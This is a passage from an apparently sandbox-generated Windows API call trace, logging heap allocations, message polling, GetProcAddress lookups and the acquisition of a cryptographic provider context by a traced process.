(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.742] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0238.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0238.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0238.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0238.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0238.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0238.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0238.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0238.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0238.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0238.744] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0238.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0238.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0238.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.744] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0238.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.745] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0238.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0238.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0238.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0238.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0238.745] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0238.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0238.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0238.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0238.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0238.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a08 [0238.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0238.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0238.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0238.746] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0238.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0238.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0238.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0238.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0238.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0238.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0238.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0238.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0238.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0238.747] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0238.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0238.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0238.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0238.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0238.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0238.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0238.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0238.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0238.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0238.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0238.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0238.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0238.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0238.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0238.750] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0238.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0238.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0238.750] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0238.751] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0238.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0238.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0238.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0238.751] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0238.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0238.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.751] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0238.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0238.752] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.752] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.752] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0238.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0238.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0238.752] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.752] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.752] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0238.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.752] RtlAllocateHeap 